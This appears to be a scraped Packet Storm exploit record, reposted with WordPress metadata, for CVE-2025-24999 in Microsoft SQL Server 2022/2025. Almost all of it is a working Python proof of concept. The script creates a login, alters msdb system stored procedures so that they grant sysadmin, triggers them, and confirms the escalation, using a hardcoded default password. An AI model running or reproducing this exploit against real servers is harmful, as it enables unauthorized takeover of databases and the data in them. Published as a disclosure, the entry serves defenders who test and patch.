{“lastseen”:”2026-04-24T20:45:37″,”description”:”This Python script demonstrates a privilege escalation technique targeting Microsoft SQL Server, associated with CVE-2025-24999. The exploit abuses improper permission controls on system stored procedures in the msdb database to elevate a…”,”published”:”2026-04-24T00:00:00″,”modified”:”2026-04-24T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Microsoft SQL Server 2022\/2025 Privilege Escalation”,”source”:””,”references”:””,”id”:”PACKETSTORM:219769″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-24999″],”sourceData”:”==================================================================================================================================\\n | # Title : Microsoft SQL Server 2022\/2025 Privilege Escalation via Stored Procedure Abuse Python Exploit |\\n | # Author : indoushka |\\n | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 147.0.4 (64 bits) |\\n | # Vendor : https:\/\/www.microsoft.com\/fr-dz |\\n ==================================================================================================================================\\n \\n [+] Summary : This Python script demonstrates a privilege escalation technique targeting Microsoft SQL Server, associated with CVE-2025-24999. \\n The exploit abuses improper permission controls on system stored procedures in the msdb database to elevate a low-privileged account to SYSADMIN.\\n \\n [+] POC : \\n \\n #!\/usr\/bin\/env python3\\n \\n import pyodbc\\n import sys\\n import time\\n \\n \\n class SQLServerExploit:\\n def __init__(self, server, database=’master’, username=None, password=None, use_windows_auth=False):\\n self.server = server\\n self.database = database\\n self.conn = None\\n self.cursor = None\\n \\n if not use_windows_auth and (not username or not password):\\n raise ValueError(\\”Username and password required for SQL authentication\\”)\\n \\n if use_windows_auth:\\n self.conn_string = (\\n f’DRIVER={{ODBC Driver 17 for SQL Server}};’\\n f’SERVER={server};DATABASE={database};Trusted_Connection=yes;’\\n )\\n else:\\n self.conn_string = (\\n f’DRIVER={{ODBC Driver 17 for SQL Server}};’\\n f’SERVER={server};DATABASE={database};UID={username};PWD={password};’\\n )\\n \\n def connect(self):\\n try:\\n self.conn = pyodbc.connect(self.conn_string, autocommit=True)\\n self.cursor = self.conn.cursor()\\n print(f\\”[+] Connected to {self.server}\\”)\\n return True\\n except Exception as e:\\n print(f\\”[-] Connection failed: {e}\\”)\\n return False\\n \\n def execute_query(self, query, database=None):\\n if not self.cursor:\\n print(\\”[-] No active database connection\\”)\\n return False\\n \\n try:\\n if database:\\n self.cursor.execute(f\\”USE [{database}]\\”)\\n \\n self.cursor.execute(query)\\n \\n try:\\n return self.cursor.fetchall()\\n except pyodbc.ProgrammingError:\\n return []\\n except Exception as e:\\n print(f\\”[-] Query execution failed: {e}\\”)\\n return False\\n \\n def create_low_privilege_account(self, username, password):\\n queries = [\\n f\\”IF NOT EXISTS (SELECT * FROM sys.server_principals WHERE name = ‘{username}’) \\”\\n f\\”CREATE LOGIN [{username}] WITH PASSWORD = N'{password}’, CHECK_POLICY = OFF\\”,\\n f\\”ALTER SERVER ROLE [##MS_DatabaseManager##] ADD MEMBER [{username}]\\”\\n ]\\n \\n for query in queries:\\n result = self.execute_query(query)\\n if result is False:\\n return False\\n \\n print(f\\”[+] Created low-privilege account: {username}\\”)\\n return True\\n \\n def exploit(self, target_username, target_password):\\n print(f\\”[*] Starting exploitation for user: {target_username}\\”)\\n \\n setup_queries = [\\n f\\”USE [msdb]\\”,\\n f\\”IF NOT EXISTS (SELECT * FROM sys.database_principals WHERE name = ‘{target_username}’) \\”\\n f\\”CREATE USER [{target_username}] FOR LOGIN [{target_username}]\\”,\\n f\\”ALTER ROLE [SQLAgentOperatorRole] ADD MEMBER [{target_username}]\\”\\n ]\\n \\n for query in setup_queries:\\n if self.execute_query(query) is False:\\n print(\\”[-] MSDB setup failed\\”)\\n return False\\n \\n print(f\\”[+] Configured MSDB for {target_username}\\”)\\n \\n exploit_code = f\\”\\”\\”\\n ALTER PROCEDURE [dbo].[sp_delete_database_backuphistory]\\n @database_name sysname\\n AS\\n BEGIN\\n EXEC(‘ALTER SERVER ROLE [sysadmin] ADD MEMBER [{target_username}]’)\\n END\\n \\”\\”\\”\\n \\n if self.execute_query(exploit_code, ‘msdb’) is False:\\n return False\\n \\n exploit_code2 = f\\”\\”\\”\\n ALTER PROCEDURE [dbo].[sp_delete_backuphistory]\\n @database_name sysname\\n AS\\n BEGIN\\n EXEC(‘ALTER SERVER ROLE [sysadmin] ADD MEMBER [{target_username}]’)\\n END\\n \\”\\”\\”\\n \\n if self.execute_query(exploit_code2, ‘msdb’) is False:\\n return False\\n \\n print(\\”[+] Stored procedures modified\\”)\\n \\n trigger_queries = [\\n \\”IF DB_ID(‘temp_exploit_db’) IS NULL CREATE DATABASE temp_exploit_db\\”,\\n \\”EXEC msdb.dbo.sp_delete_database_backuphistory @database_name = N’temp_exploit_db’\\”,\\n \\”DROP DATABASE temp_exploit_db\\”\\n ]\\n \\n for query in trigger_queries:\\n if self.execute_query(query) is False:\\n print(f\\”[-] Trigger failed: {query}\\”)\\n return False\\n \\n print(\\”[+] Exploit triggered\\”)\\n \\n time.sleep(1)\\n result = self.execute_query(\\n f\\”SELECT IS_SRVROLEMEMBER(‘sysadmin’, ‘{target_username}’)\\”\\n )\\n \\n if result and result[0][0] == 1:\\n print(f\\”[+] SUCCESS! {target_username} is SYSADMIN\\”)\\n return True\\n \\n print(\\”[-] Exploit failed\\”)\\n return False\\n \\n def cleanup(self, username):\\n \\n queries = [\\n f\\”DROP USER [{username}]\\”,\\n f\\”DROP LOGIN [{username}]\\”\\n ]\\n \\n for query in queries:\\n try:\\n self.execute_query(query, ‘msdb’)\\n self.execute_query(query)\\n except Exception:\\n pass\\n \\n print(f\\”[+] Cleanup completed\\”)\\n \\n def close(self):\\n try:\\n if self.cursor:\\n self.cursor.close()\\n except:\\n pass\\n \\n try:\\n if self.conn:\\n self.conn.close()\\n except:\\n pass\\n \\n \\n def main():\\n print(\\”=\\” * 60)\\n print(\\”CVE-2025-24999 – SQL Server Privilege Escalation Exploit\\”)\\n print(\\”=\\” * 60)\\n \\n server = input(\\”Enter SQL Server address: \\”).strip()\\n use_auth = input(\\”Use Windows authentication? (y\/n): \\”).strip().lower()\\n \\n try:\\n if use_auth == ‘y’:\\n exploit = SQLServerExploit(server, use_windows_auth=True)\\n else:\\n username = input(\\”Enter SQL username (SYSADMIN): \\”).strip()\\n password = input(\\”Enter password: \\”).strip()\\n exploit = SQLServerExploit(server, username=username, password=password)\\n except ValueError as e:\\n print(f\\”[-] {e}\\”)\\n sys.exit(1)\\n \\n if not exploit.connect():\\n sys.exit(1)\\n \\n target_user = input(\\”Target username (default exploit_user): \\”).strip() or \\”exploit_user\\”\\n target_pass = input(\\”Password (default Exploit@123): \\”).strip() or \\”Exploit@123\\”\\n \\n if exploit.create_low_privilege_account(target_user, target_pass):\\n if exploit.exploit(target_user, target_pass):\\n print(f\\”\\\\n[+] Exploit completed\\”)\\n print(f\\”[+] Credentials: {target_user}\/{target_pass}\\”)\\n \\n if input(\\”Cleanup? (y\/n): \\”).lower() == ‘y’:\\n exploit.cleanup(target_user)\\n else:\\n print(\\”[-] Exploit failed\\”)\\n else:\\n print(\\”[-] User creation failed\\”)\\n \\n exploit.close()\\n \\n \\n if __name__ == \\”__main__\\”:\\n main()\\n \\t\\n Greetings to :==============================================================================\\n jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|\\n ============================================================================================”,”sourceHref”:”https:\/\/packetstorm.news\/download\/219769″,”cvss”:{“score”:8.8,”severity”:”HIGH”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:L\/UI:N\/S:U\/C:H\/I:H\/A:H”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/219769\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-04-24T20:45:37″,”description”:”This Python script demonstrates a privilege escalation technique targeting Microsoft SQL Server, associated with CVE-2025-24999. The exploit abuses improper permission controls on system stored procedures…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,41,12,15,13,53,7,11,5],"class_list":["post-49289","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-88","tag-exploit","tag-high","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n